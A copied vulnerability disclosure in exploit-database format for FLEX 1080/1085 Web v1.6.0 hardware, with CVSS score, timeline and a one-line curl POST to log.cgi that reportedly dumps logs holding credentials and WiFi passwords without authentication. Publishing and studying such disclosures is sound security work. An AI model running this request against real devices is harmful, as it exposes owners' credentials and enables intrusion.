Below is a copy: FLEX 1080/1085 Web 1.6.0 Information Disclosure
# Exploit Title: FLEX 1080/1085 Web - Information Disclosure
# Exploit Author: Mr Empy
# Vendor Homepage: https://www.tem.ind.br/
# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
# Version: 1.6.0
# Tested on: Linux
Title:
================
FLEX 1080/1085 Web - Information Disclosure
Summary:
================
The FLEX 1080/1085 Web hardware allows the attacker to obtain sensitive
information such as username and password, WiFi SSID and WiFi password.
Severity Level:
================
9.1 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Vulnerability Disclosure Schedule:
============================
* January 13, 2022: An email was sent to support.
* February 13, 2022: I didn't get any response from support.
* February 14, 2022: Vulnerability Disclosure
Affected Product:
================
FLEX 1080/1085 Web v1.6.0
Steps to Reproduce:
================
1. Open a terminal and enter the following command:
curl -X POST http://target.com/sistema/log.cgi -d 'force=1'
After that you will be able to see the hardware logs without having any
authentication.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum